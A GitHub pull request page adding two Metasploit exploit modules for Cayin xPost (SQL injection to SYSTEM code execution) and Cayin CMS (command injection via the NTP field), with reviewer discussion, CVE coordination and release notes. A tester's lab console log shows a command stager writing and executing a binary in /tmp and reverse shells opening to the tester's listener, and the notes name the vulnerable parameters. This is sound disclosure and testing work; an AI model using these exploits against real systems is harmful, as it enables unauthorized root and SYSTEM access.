Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cayin xPost and CMS exploits #13607

Merged
merged 7 commits into from Jun 18, 2020
Merged

Cayin xPost and CMS exploits #13607

merged 7 commits into from Jun 18, 2020

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Jun 12, 2020

This PR adds 2 exploits by @liquidworm against Cayin products.

The first is Cayin xPost with an unauthenticated SQLi to RCE on windows. Luckily they bundle mysql and tomcat, so the env is pretty static. Gives SYSTEM level access. Once landed, this may be a good candidate for @red0xff to convert to his sqli library (and pull the user table, optionally as we discussed in slack).

The second is Cayin CMS (-SE) with an authenticated RCE. The guide said to install it on Ubuntu 16.04, my attempt on 20.04 failed, use 16.04!!! This is a pretty trivial RCE in an NTP field for root access.

Verification

  • Start msfconsole
  • use each module
  • Verify you get root/SYSTEM shells
  • Document is good and correct.

@h00die
Copy link
Contributor Author

h00die commented Jun 12, 2020

@liquidworm your CMS one, while the NTP IP field was vulnerable, we had different paths and parameters as compared to your EDB code. What device(s) did you test it against?

@liquidworm did you apply for CVEs for these findings? If not @todb-r7 can put in for them if you want.

@h00die
Copy link
Contributor Author

h00die commented Jun 12, 2020

@ccondon-r7 No rush on assigning this, but the website only lets you download the 'latest', so someone may want to go download the files now in case they get patched. Then they can let it sit for a while till they get to reviewing this.

I also have them and can provide

modules/exploits/linux/http/cayin_cms_ntp.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/cayin_cms_ntp.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/cayin_cms_ntp.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/cayin_xpost_sql_rce.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/cayin_xpost_sql_rce.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/cayin_xpost_sql_rce.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/cayin_xpost_sql_rce.rb Outdated Show resolved Hide resolved
@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Jun 12, 2020

https://www.cayintech.com/download/digital_signage_trial/CAYIN_CMS-SE_v110.zip <- Grabbed a copy of the CMS from here for safe keeping.

https://www.cayintech.com/download/digital_signage_trial/xPost_v2.5.zip <- Grabbed a copy of the xPost software from here for safe keeping.

Thanks @h00die for the heads up :) (Edit: Woops see you mentioned you already have copies as well 😅)

@liquidworm
Copy link

@liquidworm your CMS one, while the NTP IP field was vulnerable, we had different paths and parameters as compared to your EDB code. What device(s) did you test it against?

@liquidworm did you apply for CVEs for these findings? If not @todb-r7 can put in for them if you want.

@h00die The CMS was tested against version 11.0, but i've noticed in different builds there are slight changes in parameters and code for NTP server testing feature, remaining vulnerable.
I have not applied for CVE IDs, @todb-r7 can put in for them if not a hustle. Thanks ;]

@space-r7 space-r7 self-assigned this Jun 15, 2020
Copy link
Contributor

@space-r7 space-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Just a few minor things

modules/exploits/linux/http/cayin_cms_ntp.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/cayin_xpost_sql_rce.rb Outdated Show resolved Hide resolved
@todb-r7
Copy link

todb-r7 commented Jun 17, 2020

@liquidworm no hassle at all, I’ll put in for a CVE and bug you for anything that’s unclear.

@todb-r7
Copy link

todb-r7 commented Jun 17, 2020

@liquidworm Okay here's some CVEs to use:

Let's see if I can ninja-edit these into the modules.

(cc @djordan-r7 )

@h00die
Copy link
Contributor Author

h00die commented Jun 17, 2020

Thanks @todb-r7 !

@liquidworm
Copy link

Thanks @todb-r7 ^^

@space-r7
Copy link
Contributor

Tested both modules:

msf5 > use exploit/linux/http/cayin_cms_ntp 
msf5 exploit(linux/http/cayin_cms_ntp) > set rhosts 172.16.215.134
rhosts => 172.16.215.134
msf5 exploit(linux/http/cayin_cms_ntp) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(linux/http/cayin_cms_ntp) > set verbose true
verbose => true
msf5 exploit(linux/http/cayin_cms_ntp) > check

[+] Cayin CMS install detected
[*] 172.16.215.134:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/cayin_cms_ntp) > options

Module options (exploit/linux/http/cayin_cms_ntp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Username to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.215.134   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of Cayin CMS
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   administrator    yes       Username to login with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.215.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(linux/http/cayin_cms_ntp) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Cayin CMS install detected
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0'>>/tmp/lSdfj", "printf '\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\254\\20\\327\\1\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200'>>/tmp/lSdfj", "printf '\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170'>>/tmp/lSdfj", "printf '\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/lSdfj ; chmod +x /tmp/lSdfj ; /tmp/lSdfj ; rm -f /tmp/lSdfj"]
[*] Command Stager progress -  25.95% done (199/767 bytes)
[*] Command Stager progress -  51.76% done (397/767 bytes)
[*] Command Stager progress -  77.84% done (597/767 bytes)
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 172.16.215.134
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.134:53672) at 2020-06-18 10:17:56 -0500
[*] Command Stager progress - 100.00% done (767/767 bytes)

meterpreter > getuid
Server username: no-user @ CMS-SE (uid=0, gid=1001, euid=0, egid=1001)
meterpreter > sysinfo
Computer     : 172.16.215.134
OS           : Ubuntu 16.04 (Linux 4.15.0-45-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.215.134 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(linux/http/cayin_cms_ntp) > use exploit/windows/http/cayin_xpost_sql_rce 
msf5 exploit(windows/http/cayin_xpost_sql_rce) > set rhosts 192.168.37.131
rhosts => 192.168.37.131
msf5 exploit(windows/http/cayin_xpost_sql_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/http/cayin_xpost_sql_rce) > options

Module options (exploit/windows/http/cayin_xpost_sql_rce):

   Name          Current Setting        Required  Description
   ----          ---------------        --------  -----------
   LOCALWEBROOT  C:/CayinApps/webapps/  yes       Local install path webroot
   PAYLOADNAME                          no        Name of payload file to write
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.37.131         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80                     yes       The target port (TCP)
   SSL           false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                      yes       The URI of Cayin xPost
   VHOST                                no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(windows/http/cayin_xpost_sql_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.131:52540) at 2020-06-18 10:19:14 -0500
[!] Tried to delete C:/CayinApps/webapps/hq3HvyOcp4x.jsp, unknown result


C:\CayinApps\Tomcat>
C:\CayinApps\Tomcat> whoami
 whoami
nt authority\system

@space-r7 space-r7 merged commit db4006e into rapid7:master Jun 18, 2020
3 checks passed
@space-r7
Copy link
Contributor

space-r7 commented Jun 18, 2020

Release Notes

Cayin CMS NTP Server RCE and Cayin xPost wayfinder_seqid SQLi to RCE modules exploit Cayin software. The Cayin xPost module exploits a blind SQL injection vulnerability that results in code execution as SYSTEM. The Cayin CMS NTP module gets authenticated code execution by injecting code into the ntpIP parameter in a request to system_service.cgi.

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 19, 2020
@h00die h00die deleted the cayin branch July 21, 2020 23:06
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

7 participants